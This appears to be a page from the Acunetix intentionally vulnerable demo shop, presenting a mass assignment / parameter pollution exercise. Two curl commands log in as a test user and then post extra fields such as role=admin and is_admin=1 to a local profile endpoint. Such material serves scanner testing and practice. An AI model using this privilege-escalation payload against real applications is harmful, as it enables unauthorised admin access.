Acunetix Art

TEST and Demonstration site for Acunetix Web Vulnerability Scanner
WARNING: This is not a real shop. This is an example PHP application which is intentionally vulnerable to web attacks. It is intended to help you test security scanners and practice manual hacking skills.
Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.

Mass Assignment / Parameter Pollution

User Profile Update

Please login to update your profile.

curl Test

# Login first, get session cookie
curl -c /tmp/cookies.txt -X POST -d "uname=test&pass=test" http://localhost/login.php

# Mass assignment — add extra fields
curl -b /tmp/cookies.txt -X POST -d "email=hacker@evil.com&role=admin&is_admin=1&cc=4111-1111-1111-1111" http://localhost/assigned.php